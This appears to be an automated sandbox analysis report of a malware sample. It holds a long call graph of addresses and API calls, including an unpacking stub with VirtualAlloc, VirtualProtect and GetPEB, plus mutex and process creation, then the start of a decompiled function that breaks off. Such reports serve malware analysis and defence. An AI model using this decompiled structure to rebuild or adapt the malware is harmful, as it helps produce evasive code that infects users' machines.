11861->11854 11864 100095e1 HeapAlloc 11866 100051fd 11864->11866 11867 100092e5 2 API calls 11866->11867 11873 10005215 11867->11873 11868 10005245 11870 100085d5 2 API calls 11868->11870 11869 1000e2c6 42 API calls 11871 10004f64 11869->11871 11872 10005251 lstrcpynW lstrcpynW 11870->11872 11874 10004fb3 11871->11874 11879 10005082 11871->11879 11906 100051f1 11871->11906 11875 10005296 11872->11875 11873->11868 11876 1000861a 2 API calls 11873->11876 11881 10004fbc 11874->11881 11874->11906 11877 1000861a 2 API calls 11875->11877 11876->11868 11878 100052a8 11877->11878 11880 1000861a 2 API calls 11878->11880 11879->11906 12126 1000fc1f 11879->12126 11880->11841 12121 10008604 HeapAlloc 11881->12121 11885 10005006 11885->11841 11887 100095e1 HeapAlloc 11885->11887 11888 1000501f 11887->11888 11890 10009640 2 API calls 11888->11890 11889 10005110 11892 1000109a HeapAlloc 11889->11892 11889->11906 11891 10005052 11890->11891 11893 100085d5 2 API calls 11891->11893 11894 10005129 11892->11894 11895 1000505c 11893->11895 11896 1000902d _ftol2_sse 11894->11896 12122 1000a911 memset 11895->12122 11898 1000514b 11896->11898 12137 100060df 11898->12137 11901 1000861a 2 API calls 11901->11841 11903 100051e2 11904 1000861a 2 API calls 11903->11904 11904->11906 11905 10009640 2 API calls 11907 100051ba 11905->11907 11906->11864 11908 100085d5 2 API calls 11907->11908 11909 100051c4 11908->11909 11910 1000a911 2 API calls 11909->11910 11911 100051d6 11910->11911 11912 1000861a 2 API calls 11911->11912 11912->11903 11915 1000a3ad 11913->11915 11920 10005bb5 11913->11920 11914 1000a3d2 11917 1000861a 2 API calls 11914->11917 11915->11914 11916 1000861a 2 API calls 11915->11916 11916->11915 11918 1000a3dd 11917->11918 11919 1000861a 2 API calls 11918->11919 11919->11920 11920->11652 11922 100084ab HeapAlloc 11921->11922 11923 10001096 11922->11923 11924 1000a51a 11923->11924 11925 1000a538 11924->11925 11926 1001242d _ftol2_sse 11925->11926 11930 10005aa7 11925->11930 11927 1000a552 FindResourceA 11926->11927 11927->11925 11928 1000a580 11927->11928 11929 10008669 HeapAlloc 11928->11929 11928->11930 11929->11930 11930->11815 11932 10005ad4 11931->11932 11933 1000891f 11931->11933 11932->11822 11939 1000a2e3 11932->11939 11950 10008604 HeapAlloc 11933->11950 11935 10008929 11935->11932 11951 10008815 11935->11951 11938 1000861a 2 API calls 11938->11932 11986 10008a90 11939->11986 11943 1000a397 11943->11822 11944 1000a38f 12001 10008cc0 11944->12001 11947 1000a2fd 11947->11943 11947->11944 11948 10008698 3 API calls 11947->11948 11992 10009749 11947->11992 11997 100091a6 11947->11997 11948->11947 11950->11935 11961 10008604 HeapAlloc 11951->11961 11953 100088d6 11954 1000861a 2 API calls 11953->11954 11955 10008837 11953->11955 11954->11955 11955->11932 11955->11938 11956 1000882a 11956->11953 11956->11955 11962 1000ebf0 11956->11962 11959 100088f0 11960 1000861a 2 API calls 11959->11960 11960->11955 11961->11956 11977 10008604 HeapAlloc 11962->11977 11964 1000ec14 11965 1000ed7f 11964->11965 11978 10008604 HeapAlloc 11964->11978 11968 1000861a 2 API calls 11965->11968 11967 1000ec2c 11967->11965 11979 10008604 HeapAlloc 11967->11979 11969 1000eda5 11968->11969 11971 1000861a 2 API calls 11969->11971 11972 1000edb3 11971->11972 11973 100088cf 11972->11973 11974 1000861a 2 API calls 11972->11974 11973->11953 11973->11959 11974->11973 11975 1000ec42 11975->11965 11980 10008698 11975->11980 11977->11964 11978->11967 11979->11975 11985 10008604 HeapAlloc 11980->11985 11982 100086d5 11982->11975 11983 100086ad 11983->11982 11984 1000861a 2 API calls 11983->11984 11984->11982 11985->11983 11987 10008ab3 11986->11987 11988 10008604 HeapAlloc 11987->11988 11989 10008be7 11987->11989 11990 1000861a 2 API calls 11987->11990 11988->11987 11991 10008604 HeapAlloc 11989->11991 11990->11987 11991->11947 11993 1000974b 11992->11993 11994 10009780 SetLastError 11993->11994 11995 1000978c SetLastError 11993->11995 11996 10009799 11994->11996 11995->11996 11996->11947 11999 100091b1 11997->11999 12000 100091c7 11997->12000 12013 10008604 HeapAlloc 11999->12013 12000->11947 12002 10008d57 12001->12002 12004 10008ccf 12001->12004 12002->11943 12003 10008d09 12005 10008d19 12003->12005 12014 10008de5 12003->12014 12004->12002 12004->12003 12006 1000861a 2 API calls 12004->12006 12008 10008d34 12005->12008 12009 1000861a 2 API calls 12005->12009 12006->12004 12010 10008d4a 12008->12010 12012 1000861a 2 API calls 12008->12012 12009->12008 12011 1000861a 2 API calls 12010->12011 12011->12002 12012->12010 12013->12000 12021 10008604 HeapAlloc 12014->12021 12016 10008e28 12016->12005 12017 10008e1e 12017->12016 12019 10008e61 12017->12019 12022 1000879d 12017->12022 12020 1000861a 2 API calls 12019->12020 12020->12016 12021->12017 12023 1001242d _ftol2_sse 12022->12023 12026 100087b6 12023->12026 12024 100087e3 12024->12019 12025 1001242d _ftol2_sse 12025->12026 12026->12024 12026->12025 12028 1000a485 12027->12028 12029 1000a495 GetLastError 12028->12029 12030 1000a48b GetLastError 12028->12030 12031 1000a4a2 12029->12031 12030->12031 12031->11839 12147 10008604 HeapAlloc 12032->12147 12034 10008990 12035 100089a1 lstrcpynW 12034->12035 12043 1000899a 12034->12043 12036 10008a14 12035->12036 12037 100089c4 12035->12037 12148 10008604 HeapAlloc 12036->12148 12038 1000a6a9 3 API calls 12037->12038 12040 100089d0 12038->12040 12042 10008a39 12040->12042 12044 10008815 3 API calls 12040->12044 12041 10008a1f 12041->12042 12041->12043 12047 1000861a 2 API calls 12041->12047 12046 10008a61 12042->12046 12049 1000861a 2 API calls 12042->12049 12043->11858 12045 100089ea 12044->12045 12045->12041 12048 100089f0 12045->12048 12050 1000861a 2 API calls 12046->12050 12047->12042 12051 1000861a 2 API calls 12048->12051 12049->12046 12050->12043 12051->12043 12053 10004a41 12052->12053 12054 10004a76 12053->12054 12149 10002ba4 12053->12149 12055 1000b7a8 10 API calls 12054->12055 12066 10004ae2 12054->12066 12057 10004a8d 12055->12057 12058 1000b67d 4 API calls 12057->12058 12059 10004a9d 12058->12059 12165 100049c7 12059->12165 12061 10004aa7 12062 1000b88a 4 API calls 12061->12062 12063 10004acd 12062->12063 12176 10002c8f 12063->12176 12066->11906 12116 1000e2c6 12066->12116 12067 100092e5 2 API calls 12069 10004af8 12067->12069 12068 10004b5e 12070 10004b65 12068->12070 12071 10004bc6 12068->12071 12069->12068 12073 100095e1 HeapAlloc 12069->12073 12074 10004b4c 12069->12074 12245 1000c292 12070->12245 12075 100091e3 HeapAlloc 12071->12075 12077 10004b24 12073->12077 12074->12068 12238 1000e286 12074->12238 12079 10004bcf 12075->12079 12210 1000bfec 12077->12210 12081 100091e3 HeapAlloc 12079->12081 12082 10004bc2 12081->12082 12087 10009b43 8 API calls 12082->12087 12084 10004b99 12088 1000861a 2 API calls 12084->12088 12085 10004bae 12090 1000861a 2 API calls 12085->12090 12086 100085d5 2 API calls 12086->12074 12089 10004bfa 12087->12089 12088->12066 12089->12066 12254 10009f48 12089->12254 12090->12082 12093 10009f6c 4 API calls 12094 10004c1f 12093->12094 12095 1000a0ab 4 API calls 12094->12095 12096 10004c41 12095->12096 12097 10004c52 12096->12097 12258 1000a3ed 12096->12258 12099 10004c60 12097->12099 12101 1000a3ed 7 API calls 12097->12101 12100 1000980c GetSystemTimeAsFileTime 12099->12100 12102 10004c67 12100->12102 12101->12099 12103 1000a0ab 4 API calls 12102->12103 12106 10004c82 12103->12106 12104 10004cd8 12271 100052c0 12104->12271 12105 1000fc1f 8 API calls 12105->12106 12106->12104 12106->12105 12266 1000553f 12106->12266 12110 10004d4d lstrcpyW 12110->12066 12111 10004d0e 12112 1000109a HeapAlloc 12111->12112 12113 10004d18 lstrcpyW 12112->12113 12114 100085d5 2 API calls 12113->12114 12115 10004d2f lstrcatW lstrcatW lstrcatW 12114->12115 12115->12066 12117 1000e2fa 12116->12117 12119 10004f40 12117->12119 12318 10008604 HeapAlloc 12117->12318 12319 10004905 12117->12319 12119->11869 12119->11871 12121->11885 12123 1000a943 12122->12123 12124 1000506e 12123->12124 12125 1000a98a GetExitCodeProcess 12123->12125 12124->11901 12125->12124 12127 1000fc43 12126->12127 12128 100050fa 12126->12128 12129 10008669 HeapAlloc 12127->12129 12128->11906 12136 10008604 HeapAlloc 12128->12136 12130 1000fc4d 12129->12130 12130->12128 12131 100060df 4 API calls 12130->12131 12135 1000fc8e 12130->12135 12133 1000fcac 12131->12133 12132 1000861a 2 API calls 12132->12128 12133->12135 12378 1000f7e3 12133->12378 12135->12132 12136->11889 12138 100060ea 12137->12138 12139 10005168 12137->12139 12413 10008604 HeapAlloc 12138->12413 12139->11903 12139->11905 12141 100060f4 12141->12139 12142 1000109a HeapAlloc 12141->12142 12143 1000610b 12142->12143 12144 100092e5 2 API calls 12143->12144 12145 1000612c 12144->12145 12146 100085d5 2 API calls 12145->12146 12146->12139 12147->12034 12148->12041 12150 10002bc0 12149->12150 12151 1000109a HeapAlloc 12150->12151 12164 10002c5c 12150->12164 12152 10002bd3 12151->12152 12153 100092e5 2 API calls 12152->12153 12154 10002be5 12153->12154 12155 100085d5 2 API calls 12154->12155 12156 10002bf0 12155->12156 12157 1000109a HeapAlloc 12156->12157 12158 10002bfa 12157->12158 12283 1000bf37 12158->12283 12161 100085d5 2 API calls 12162 10002c16 12161->12162 12163 1000861a 2 API calls 12162->12163 12163->12164 12164->12054 12166 10009256 2 API calls 12165->12166 12167 100049d2 12166->12167 12168 100095e1 HeapAlloc 12167->12168 12169 100049e1 12168->12169 12170 100092e5 2 API calls 12169->12170 12171 100049ed 12170->12171 12172 100085d5 2 API calls 12171->12172 12173 100049f8 12172->12173 12174 1000861a 2 API calls 12173->12174 12175 10004a03 12174->12175 12175->12061 12290 1000b700 12176->12290 12178 10002ca8 12179 10002cb4 12178->12179 12180 10002d29 12178->12180 12181 1000109a HeapAlloc 12179->12181 12182 10002ba4 4 API calls 12180->12182 12183 10002cbe 12181->12183 12184 10002d3b 12182->12184 12189 10002ce8 12183->12189 12190 10002cdf 12183->12190 12185 10002d40 12184->12185 12186 10002d8a 12184->12186 12306 1000b012 memset memset 12185->12306 12187 10002c64 3 API calls 12186->12187 12198 10002d26 12187->12198 12194 1000109a HeapAlloc 12189->12194 12299 10002c64 12190->12299 12191 10002d4b 12193 1000109a HeapAlloc 12191->12193 12196 10002d55 12193->12196 12197 10002cf2 12194->12197 12195 10002ce4 12201 100085d5 2 API calls 12195->12201 12199 100092e5 2 API calls 12196->12199 12200 100092e5 2 API calls 12197->12200 12202 10002dc1 12198->12202 12203 10002d9f CreateDirectoryW 12198->12203 12204 10002d7a 12199->12204 12205 10002d0f 12200->12205 12201->12198 12202->12066 12202->12067 12207 10002dab 12203->12207 12208 100085d5 2 API calls 12204->12208 12206 100085d5 2 API calls 12205->12206 12206->12195 12207->12202 12209 1000861a 2 API calls 12207->12209 12208->12198 12209->12202 12211 1000c00b 12210->12211 12213 10004b42 12210->12213 12212 100095e1 HeapAlloc 12211->12212 12211->12213 12216 1000c054 12212->12216 12213->12086 12214 1000c0f2 12215 100085d5 2 API calls 12214->12215 12215->12213 12216->12214 12311 10008604 HeapAlloc 12216->12311 12218 1000c0e8 12218->12214 12219 1000c0f9 12218->12219 12220 100095e1 HeapAlloc 12219->12220 12221 1000c103 12220->12221 12222 10009640 2 API calls 12221->12222 12223 1000c11b 12222->12223 12224 1000c1ab 12223->12224 12225 1000c170 12223->12225 12226 1000c131 12223->12226 12228 1000861a 2 API calls 12224->12228 12229 10009640 2 API calls 12225->12229 12227 10009640 2 API calls 12226->12227 12230 1000c149 12227->12230 12231 1000c1d1 12228->12231 12232 1000c16b 12229->12232 12233 10009640 2 API calls 12230->12233 12234 100085d5 2 API calls 12231->12234 12237 1000a911 2 API calls 12232->12237 12233->12232 12235 1000c1da 12234->12235 12236 100085d5 2 API calls 12235->12236 12236->12213 12237->12224 12239 100095e1 HeapAlloc 12238->12239 12240 1000e29c 12239->12240 12241 1000bfec 6 API calls 12240->12241 12242 1000e2b4 12241->12242 12243 100085d5 2 API calls 12242->12243 12244 1000e2bd 12243->12244 12244->12068 12246 1000a86d 5 API calls 12245->12246 12247 1000c2a4 12246->12247 12248 100095c7 HeapAlloc 12247->12248 12249 1000c2ae 12248->12249 12250 10009292 2 API calls 12249->12250 12251 1000c2bd 12250->12251 12252 100085c2 2 API calls 12251->12252 12253 10004b6e 12252->12253 12253->12084 12253->12085 12255 10009f55 12254->12255 12255->12255 12256 1000a0ab 4 API calls 12255->12256 12257 10004c16 12256->12257 12257->12093 12259 1000a46a 12258->12259 12263 1000a400 12258->12263 12259->12097 12261 10009749 2 API calls 12261->12263 12262 1000a424 GetLastError 12262->12263 12263->12259 12263->12261 12263->12262 12264 1000a0ab 4 API calls 12263->12264 12265 10009f48 4 API calls 12263->12265 12312 10009ed0 12263->12312 12264->12263 12265->12263 12270 10005564 12266->12270 12267 10005626 12267->12106 12268 1000a6a9 3 API calls 12268->12270 12269 1000861a 2 API calls 12269->12270 12270->12267 12270->12268 12270->12269 12272 100052d6 12271->12272 12273 100052ef 12271->12273 12317 10008604 HeapAlloc 12272->12317 12275 10008698 3 API calls 12273->12275 12276 100052e0 12275->12276 12277 1000b88a 4 API calls 12276->12277 12282 10004cf8 12276->12282 12278 10005344 12277->12278 12279 100122d3 _ftol2_sse 12278->12279 12280 10005377 12279->12280 12281 1000902d _ftol2_sse 12280->12281 12281->12282 12282->12066 12282->12110 12282->12111 12284 1000bf64 12283->12284 12287 10002c08 12284->12287 12289 10008604 HeapAlloc 12284->12289 12286 1000bf94 12286->12287 12288 1000861a 2 API calls 12286->12288 12287->12161 12288->12287 12289->12286 12291 100095c7 HeapAlloc 12290->12291 12292 1000b71a 12291->12292 12293 1001242d _ftol2_sse 12292->12293 12296 1000b74f 12293->12296 12294 1000b793 12295 100085c2 2 API calls 12294->12295 12297 1000b7a1 12295->12297 12296->12294 12298 1001242d _ftol2_sse 12296->12298 12297->12178 12298->12296 12300 1000109a HeapAlloc 12299->12300 12301 10002c73 12300->12301 12302 100091e3 HeapAlloc 12301->12302 12303 10002c7d 12302->12303 12304 100085d5 2 API calls 12303->12304 12305 10002c88 12304->12305 12305->12195 12307 1000b062 12306->12307 12308 1000b946 5 API calls 12307->12308 12309 1000b067 12308->12309 12310 1000b0c5 lstrcpynW 12309->12310 12310->12191 12311->12218 12313 10009f95 3 API calls 12312->12313 12314 10009ee9 12313->12314 12315 10009eff 12314->12315 12316 1000861a 2 API calls 12314->12316 12315->12263 12316->12315 12317->12276 12318->12117 12320 10004928 12319->12320 12321 10004995 12320->12321 12322 10004a0b 37 API calls 12320->12322 12321->12117 12324 10004948 12322->12324 12323 10004986 12337 100047ca 12323->12337 12324->12321 12324->12323 12327 1000ad44 12324->12327 12328 1000ad65 12327->12328 12333 1000ad5e 12327->12333 12329 1000ad71 GetLastError 12328->12329 12330 1000ad79 12328->12330 12329->12333 12331 1000b998 6 API calls 12330->12331 12332 1000ad8b 12331->12332 12332->12333 12334 1000adea 12332->12334 12335 1000ada2 memset 12332->12335 12333->12324 12336 1000861a 2 API calls 12334->12336 12335->12334 12336->12333 12338 100060df 4 API calls 12337->12338 12339 100047ef 12338->12339 12340 100047fb 12339->12340 12341 1000109a HeapAlloc 12339->12341 12340->12321 12342 1000481a 12341->12342 12343 100092e5 2 API calls 12342->12343 12344 1000482c 12343->12344 12345 100085d5 2 API calls 12344->12345 12346 1000483a 12345->12346 12347 10002ba4 4 API calls 12346->12347 12348 1000484c 12347->12348 12363 100048d8 12348->12363 12364 10006144 12348->12364 12350 1000861a 2 API calls 12351 100048e5 12350->12351 12353 1000861a 2 API calls 12351->12353 12353->12340 12354 100095e1 HeapAlloc 12355 10004878 12354->12355 12356 100092e5 2 API calls 12355->12356 12357 1000488f 12356->12357 12358 100085d5 2 API calls 12357->12358 12359 1000489d 12358->12359 12360 100048be 12359->12360 12362 10006144 7 API calls 12359->12362 12361 1000861a 2 API calls 12360->12361 12361->12363 12362->12360 12363->12350 12373 10008604 HeapAlloc 12364->12373 12366 10006154 12367 1000902d _ftol2_sse 12366->12367 12372 10004869 12366->12372 12368 1000617c 12367->12368 12374 1000c263 12368->12374 12371 1000861a 2 API calls 12371->12372 12372->12354 12372->12363 12373->12366 12375 1000c274 12374->12375 12376 1000bfec 6 API calls 12375->12376 12377 1000618b 12376->12377 12377->12371 12379 1000f883 12378->12379 12380 1000f7fe 12378->12380 12382 1000109a HeapAlloc 12379->12382 12381 1000109a HeapAlloc 12380->12381 12383 1000f809 12381->12383 12384 1000f88d 12382->12384 12406 10008604 HeapAlloc 12383->12406 12386 10006144 7 API calls 12384->12386 12387 1000f89e 12386->12387 12390 100085d5 2 API calls 12387->12390 12388 1000f817 12389 1001242d _ftol2_sse 12388->12389 12391 1000f833 12389->12391 12392 1000f8a9 12390->12392 12393 10009640 2 API calls 12391->12393 12394 1000f8b5 12392->12394 12396 1000f9bf 4 API calls 12392->12396 12395 1000f845 12393->12395 12398 1000861a 2 API calls 12394->12398 12397 1000a911 2 API calls 12395->12397 12396->12394 12399 1000f855 12397->12399 12405 1000f87e 12398->12405 12400 100085d5 2 API calls 12399->12400 12401 1000f868 12400->12401 12407 10009f2f 12401->12407 12404 1000861a 2 API calls 12404->12405 12405->12135 12406->12388 12410 10009f06 12407->12410 12411 1000a0ab 4 API calls 12410->12411 12412 10009f2a 12411->12412 12412->12404 12413->12141 12438 10008604 HeapAlloc 12414->12438 12416 100061ef 12417 10006360 12416->12417 12439 10008604 HeapAlloc 12416->12439 12417->11659 12419 1000626f 12420 1000861a 2 API calls 12419->12420 12421 10006352 12420->12421 12422 1000861a 2 API calls 12421->12422 12422->12417 12423 1000628d memset memset 12424 10006209 12423->12424 12424->12417 12424->12419 12424->12423 12425 1000b1b1 10 API calls 12424->12425 12425->12424 12427 10009f95 3 API calls 12426->12427 12429 10009e87 12427->12429 12428 10009e9e 12428->11674 12431 10008604 HeapAlloc 12428->12431 12429->12428 12430 1000861a 2 API calls 12429->12430 12430->12428 12431->11664 12433 1000a245 12432->12433 12434 10009b0e HeapAlloc 12433->12434 12436 1000a275 12434->12436 12435 1000a2da 12435->11671 12436->12435 12437 1000861a 2 API calls 12436->12437 12437->12435 12438->12416 12439->12424 12441 10009e66 3 API calls 12440->12441 12442 10005642 12441->12442 12443 1000980c GetSystemTimeAsFileTime 12442->12443 12445 100056c0 12442->12445 12444 1000565b 12443->12444 12446 10009f06 4 API calls 12444->12446 12445->11312 12447 1000566f 12446->12447 12448 10009f06 4 API calls 12447->12448 12449 10005685 12448->12449 12476 1000e4c1 12449->12476 12452 1000a86d 5 API calls 12453 100056a4 12452->12453 12453->12445 12454 100056e9 12453->12454 12483 10008604 HeapAlloc 12453->12483 12484 1000153b CreateMutexA 12454->12484 12457 10005707 12499 100098ee 12457->12499 12459 10005715 12511 10003017 12459->12511 12467 10005758 12560 10003d34 12467->12560 12469 1000980c GetSystemTimeAsFileTime 12471 1000572b 12469->12471 12471->12467 12471->12469 12552 1000279b 12471->12552 12477 1000e1bc 6 API calls 12476->12477 12478 1000e4d3 12477->12478 12479 1000e1bc 6 API calls 12478->12479 12480 1000e4ec 12479->12480 12576 1000e450 12480->12576 12482 1000568d 12482->12452 12483->12454 12485 10001558 CreateMutexA 12484->12485 12495 100015ad 12484->12495 12486 1000156e 12485->12486 12485->12495 12487 10001080 HeapAlloc 12486->12487 12488 10001578 12487->12488 12489 100091a6 HeapAlloc 12488->12489 12488->12495 12490 1000158c 12489->12490 12491 100085c2 2 API calls 12490->12491 12492 10001599 12491->12492 12590 10008604 HeapAlloc 12492->12590 12494 100015a3 12494->12495 12591 10008604 HeapAlloc 12494->12591 12495->12457 12497 100015c4 12497->12495 12498 1000e1bc 6 API calls 12497->12498 12498->12495 12500 1000990c 12499->12500 12501 1000996c 12500->12501 12509 10009910 12500->12509 12592 1000984a 12500->12592 12506 1000997d 12501->12506 12596 10008604 HeapAlloc 12501->12596 12503 1000a471 2 API calls 12505 100099e2 12503->12505 12507 10009a56 SetThreadPriority 12505->12507 12508 10009a1f 12505->12508 12506->12503 12506->12509 12507->12509 12508->12509 12510 1000861a 2 API calls 12508->12510 12509->12459 12510->12509 12512 10003025 12511->12512 12513 1000302a 12511->12513 12597 1000bb20 12512->12597 12515 100031c2 12513->12515 12516 1000c292 6 API calls 12515->12516 12517 100031dd 12516->12517 12518 100031e6 12517->12518 12604 10008604 HeapAlloc 12517->12604 12528 100029b1 12518->12528 12520 100031fa 12521 10003204 12520->12521 12605 1000bd10 12520->12605 12523 1000861a 2 API calls 12521->12523 12523->12518 12527 100098ee 6 API calls 12527->12521 12529 10009e66 3 API calls 12528->12529 12530 100029cf 12529->12530 12614 100028fb 12530->12614 12533 100028fb 3 API calls 12534 100029f8 12533->12534 12618 10009ea5 12534->12618 12537 10002a4c 12545 10003bb2 12537->12545 12538 100093be HeapAlloc 12539 10002a1b 12538->12539 12540 10002a37 12539->12540 12621 10002a53 12539->12621 12542 100094b7 2 API calls 12540->12542 12543 10002a42 12542->12543 12544 1000861a 2 API calls 12543->12544 12544->12537 12629 10004145 12545->12629 12547 10003c42 12668 10003821 12547->12668 12550 10003be0 12550->12471 12551 10003bd5 12551->12547 12551->12550 12649 100038f9 12551->12649 12553 100028b3 12552->12553 12557 100027d3 12552->12557 12553->12471 12554 100028aa 12554->12553 12716 10002aea 12554->12716 12557->12553 12557->12554 12558 1000980c GetSystemTimeAsFileTime 12557->12558 12711 10009e1f 12557->12711 12726 10001da0 12557->12726 12558->12557 12565 10003d42 12560->12565 12561 10003d72 12562 1000861a 2 API calls 12561->12562 12564 10003d85 12562->12564 12566 10009a8e 12564->12566 12565->12561 12731 10003c54 12565->12731 12569 10009a94 12566->12569 12567 10009aea 12568 1000861a 2 API calls 12567->12568 12570 10005762 12568->12570 12569->12567 12571 1000984a 2 API calls 12569->12571 12572 100034cb 12570->12572 12571->12569 12574 100034d4 12572->12574 12573 100034f9 12573->12445 12574->12573 12575 1000861a 2 API calls 12574->12575 12575->12573 12577 1000e49a 12576->12577 12578 1000e45e 12576->12578 12580 100095c7 HeapAlloc 12577->12580 12589 10008604 HeapAlloc 12578->12589 12581 1000e4a4 12580->12581 12583 100091a6 HeapAlloc 12581->12583 12582 1000e46f 12586 1000e4bd 12582->12586 12587 1000861a 2 API calls 12582->12587 12584 1000e4b0 12583->12584 12585 100085c2 2 API calls 12584->12585 12585->12586 12586->12482 12588 1000e493 12587->12588 12588->12482 12589->12582 12590->12494 12591->12497 12593 10009854 12592->12593 12594 1000861a 2 API calls 12593->12594 12595 10009879 12593->12595 12594->12595 12595->12500 12596->12506 12598 1000bb37 12597->12598 12599 1000bb56 12598->12599 12600 100095e1 HeapAlloc 12598->12600 12599->12513 12601 1000bb65 lstrcmpiW 12600->12601 12602 1000bb7b 12601->12602 12603 100085d5 2 API calls 12602->12603 12603->12599 12604->12520 12608 1000bd5e 12605->12608 12606 10003210 12606->12521 12609 1000bc7a 12606->12609 12607 1000bdfe LocalAlloc 12607->12606 12608->12606 12608->12607 12610 100095e1 HeapAlloc 12609->12610 12613 1000bca0 12610->12613 12611 100085d5 2 API calls 12612 10003268 12611->12612 12612->12527 12613->12611 12615 1000291c 12614->12615 12616 10002905 12614->12616 12615->12533 12617 10008698 3 API calls 12616->12617 12617->12615 12619 10009f95 3 API calls 12618->12619 12620 10002a03 12619->12620 12620->12537 12620->12538 12622 10002a5f 12621->12622 12623 10002a65 12622->12623 12624 10002a6a atol 12622->12624 12623->12539 12625 10002a81 12624->12625 12625->12623 12626 10009749 2 API calls 12625->12626 12627 10002a97 12626->12627 12628 10009749 2 API calls 12627->12628 12628->12623 12674 1000378c 12629->12674 12632 1000896f 4 API calls 12633 1000418c 12632->12633 12634 10008a90 3 API calls 12633->12634 12637 10004197 12633->12637 12635 100041b3 12634->12635 12635->12637 12680 10008604 HeapAlloc 12635->12680 12636 10004397 12640 1000861a 2 API calls 12636->12640 12637->12636 12639 10008cc0 4 API calls 12637->12639 12639->12636 12641 100043a2 12640->12641 12641->12551 12642 10004356 12642->12637 12644 1000861a 2 API calls 12642->12644 12643 100093be HeapAlloc 12647 10004201 12643->12647 12644->12637 12645 10009749 SetLastError SetLastError 12645->12647 12646 10008669 HeapAlloc 12646->12647 12647->12637 12647->12642 12647->12643 12647->12645 12647->12646 12648 100094b7 HeapFree memset 12647->12648 12648->12647 12650 10003913 12649->12650 12684 1000b4a3 12650->12684 12653 1000c8fd 3 API calls 12657 1000395c 12653->12657 12654 1000861a 2 API calls 12655 10003bab 12654->12655 12655->12551 12656 1000392d 12656->12654 12657->12656 12663 1000cb77 27 API calls 12657->12663 12665 10003a72 12657->12665 12667 10003a7a 12657->12667 12690 1000ae66 memset CreateProcessW 12657->12690 12659 10003ab6 12661 1000861a 2 API calls 12659->12661 12660 1000861a 2 API calls 12660->12667 12662 10003ac6 12661->12662 12662->12656 12664 10008698 3 API calls 12662->12664 12663->12657 12664->12656 12691 10003892 12665->12691 12667->12659 12667->12660 12672 10003832 12668->12672 12669 10003873 12671 1000861a 2 API calls 12669->12671 12670 1000861a 2 API calls 12670->12672 12673 10003888 12671->12673 12672->12669 12672->12670 12673->12550 12675 100037b6 12674->12675 12681 100090a5 12675->12681 12678 100092e5 2 API calls 12679 10003816 12678->12679 12679->12632 12680->12647 12682 1000902d _ftol2_sse 12681->12682 12683 100037ea 12682->12683 12683->12678 12685 1000b4b9 12684->12685 12698 10008604 HeapAlloc 12685->12698 12687 1000b4c4 12688 10003924 12687->12688 12689 1000b578 memcpy 12687->12689 12688->12653 12688->12656 12689->12687 12690->12657 12699 1000921a 12691->12699 12695 100038c8 12696 1000861a 2 API calls 12695->12696 12697 100038da 12696->12697 12697->12667 12698->12687 12700 100038b0 GetProcessId 12699->12700 12701 10009223 12699->12701 12705 1000a8be 12700->12705 12710 10008604 HeapAlloc 12701->12710 12703 10009234 12703->12700 12704 1000923b WideCharToMultiByte 12703->12704 12704->12700 12706 10009601 2 API calls 12705->12706 12707 1000a8e4 12706->12707 12708 1000a8f0 CharUpperBuffA 12707->12708 12709 1000a90e 12708->12709 12709->12695 12710->12703 12712 10009f95 3 API calls 12711->12712 12713 10009e42 12712->12713 12714 1000861a 2 API calls 12713->12714 12715 10009e5c 12713->12715 12714->12715 12715->12557 12730 10008604 HeapAlloc 12716->12730 12718 10002b81 12719 10009f48 4 API calls 12718->12719 12721 10002b90 12719->12721 12720 10002b05 12720->12718 12722 10002b37 lstrcatA 12720->12722 12724 10009601 2 API calls 12720->12724 12725 10002b0f 12720->12725 12723 1000861a 2 API calls 12721->12723 12722->12720 12723->12725 12724->12720 12725->12553 12727 10001db7 12726->12727 12729 10001de0 12726->12729 12728 100098ee 6 API calls 12727->12728 12727->12729 12728->12729 12729->12557 12730->12720 12732 10009601 2 API calls 12731->12732 12733 10003c79 12732->12733 12733->12565 12734->11323 12735->11326 12736 10005e96 12737 10005ea6 ExitProcess 12736->12737 12738 10077380 12740 1007738a 12738->12740 12741 100773ab 12740->12741 12743 1007792e 12741->12743 12744 10077973 12743->12744 12745 10077a0f VirtualAlloc 12744->12745 12746 100779d1 VirtualAlloc 12744->12746 12747 10077a55 12745->12747 12746->12745 12748 10077a6e VirtualAlloc 12747->12748 12763 100775dd 12748->12763 12751 10077ba8 VirtualProtect 12752 10077bc7 12751->12752 12755 10077bfa 12751->12755 12754 10077bd5 VirtualProtect 12752->12754 12752->12755 12753 10077ad7 12753->12751 12754->12752 12756 10077c7c VirtualProtect 12755->12756 12757 10077cb7 VirtualProtect 12756->12757 12759 10077d14 VirtualFree GetPEB 12757->12759 12760 10077d40 12759->12760 12765 1007785d GetPEB 12760->12765 12762 10077d84 12764 100775ec VirtualFree 12763->12764 12764->12753 12766 1007788d 12765->12766 12766->12762

        Executed Functions

        Function 1000D01F, Relevance: 35.3, APIs: 15, Strings: 5, Instructions: 282COMMON
        Download Yara Rule

        Control-flow Graph

        C-Code - Quality: 91%
        			E1000D01F(void* __fp0) {
				long _v8;
				long _v12;
				union _SID_NAME_USE _v16;
				struct _SYSTEM_INFO _v52;
				char _v180;
				short _v692;
				char _v704;
				char _v2680;
				void* __esi;
				struct _OSVERSIONINFOA* _t81;
				intOrPtr _t83;
				void* _t84;
				long _t86;
				void** _t88;
				intOrPtr _t90;
				intOrPtr _t91;
				intOrPtr _t92;
				intOrPtr _t97;
				void* _t98;
				intOrPtr _t103;
				char* _t105;
				void* _t108;
				intOrPtr _t111;
				long _t115;
				signed int _t117;
				long _t119;
				intOrPtr _t124;
				intOrPtr _t127;
				intOrPtr _t130;
				intOrPtr _t134;
				intOrPtr _t145;
				intOrPtr _t147;
				intOrPtr _t149;
				intOrPtr _t152;
				intOrPtr _t154;
				signed int _t159;
				struct HINSTANCE__* _t162;
				short* _t164;
				intOrPtr _t167;
				WCHAR* _t168;
				char* _t169;
				intOrPtr _t181;
				intOrPtr _t200;
				void* _t215;
				long _t218;
				void* _t219;
				char* _t220;
				struct _OSVERSIONINFOA* _t222;
				void* _t223;
				int* _t224;
				void* _t241;

				_t241 = __fp0;
				_t162 =  *0x1001e69c; // 0x10000000
				_t81 = E10008604(0x1ac4);
				_t222 = _t81;
				if(_t222 == 0) {
					return _t81;
				}
				 *((intOrPtr*)(_t222 + 0x1640)) = GetCurrentProcessId();
				_t83 =  *0x1001e684; // 0x219faa0
				_t84 =  *((intOrPtr*)(_t83 + 0xa0))(_t215);
				_t3 = _t222 + 0x648; // 0x648
				E10012301( *((intOrPtr*)(_t222 + 0x1640)) + _t84, _t3);
				_t5 = _t222 + 0x1644; // 0x1644
				_t216 = _t5;
